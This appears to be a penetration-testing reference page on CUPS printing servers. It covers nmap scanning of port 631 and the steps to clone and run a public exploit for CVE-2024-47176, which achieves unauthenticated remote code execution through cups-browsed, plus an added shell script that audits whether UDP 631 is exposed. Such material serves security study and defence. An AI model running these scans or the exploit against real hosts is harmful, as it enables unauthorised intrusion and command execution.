Brief

CUPS (formerly an acronym for Common UNIX Printing System) is a modular printing system for Unix-like computer operating systems which allows a computer to act as a print server. A computer running CUPS is a host that can accept print jobs from client computers, process them, and send them to the appropriate printer. CUPS consists of a print spooler and scheduler, a filter system that converts the print data to a format that the printer will understand, and a backend system that sends this data to the print device. CUPS uses the Internet Printing Protocol (IPP) as the basis for managing print jobs and queues.

Scanning

# run all CUPS-related NSE scripts (quote the glob so the shell does not expand it)
nmap -sV -p631 --script="cups*" $target
 
# lists printers managed by the CUPS printing service
nmap -sV -p631 --script=cups-info $target
 
# lists currently queued print jobs of the remote CUPS service grouped by printer
nmap -sV -p631 --script=cups-queue-info $target

Exploit

CVE-2024-47176 - Unauthenticated RCE on cups-browsed

  • Systems potentially vulnerable :
    • The cups-browsed package
      • 2.0.1
      • Is started/enabled and listening on UDP 631
    • To exploit this chain of vulnerabilities, an attacker has to trick a user into printing from a malicious print server.
  • Install & exploit :
# install
git clone https://github.com/l0n3m4n/CVE-2024-47176.git
cd CVE-2024-47176
pip install zeroconf ippserver colorama
 
# exploit
python3 CVE-2024-47176.py -l $listener_ip -s $printer_spoof_name -p 631 -r $command_to_execute -t $target_ip
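
The "listening on UDP 631" condition listed above can be audited from the host itself. The script below is an added example, not part of the original page or of any project it references; the function name and the sample socket lines are constructed for illustration, and it assumes input in the format printed by `ss -H -uln`.

```shell
#!/bin/sh
# Added example: audit the "listening on UDP 631" condition for cups-browsed.
# udp631_exposed reads `ss -H -uln` style lines on stdin, prints every
# non-loopback local address bound to port 631, and returns 0 if any exist.

udp631_exposed() {
    awk '
        {
            # The first field containing ":" is Local Address:Port,
            # whether or not ss printed a leading Netid column.
            la = ""
            for (i = 1; i <= NF; i++) if (index($i, ":")) { la = $i; break }
            if (la == "") next

            n = split(la, parts, ":")
            port = parts[n]
            if (port != "631") next

            addr = substr(la, 1, length(la) - length(port) - 1)
            sub(/%.*$/, "", addr)      # drop interface scope, e.g. %lo
            sub(/^\[/, "", addr)       # drop IPv6 brackets
            sub(/\]$/, "", addr)

            # Loopback-only listeners are not reachable from the network.
            if (addr ~ /^127\./ || addr == "::1") next

            print addr
            found = 1
        }
        END { exit(found ? 0 : 1) }
    '
}

# Constructed sample input (not captured from a real host).
SAMPLE_EXPOSED='UNCONN 0 0 0.0.0.0:631 0.0.0.0:*
UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
UNCONN 0 0 [::1]:631 [::]:*'
SAMPLE_LOCAL='UNCONN 0 0 127.0.0.1:631 0.0.0.0:*'

if printf '%s\n' "$SAMPLE_EXPOSED" | udp631_exposed >/dev/null; then
    echo "sample 1: UDP 631 bound on a non-loopback address"
fi
if ! printf '%s\n' "$SAMPLE_LOCAL" | udp631_exposed >/dev/null; then
    echo "sample 2: UDP 631 bound on loopback only"
fi
```

On a live host, run `ss -H -uln | udp631_exposed` and pair the result with `systemctl is-enabled cups-browsed` to cover the "started/enabled" condition as well.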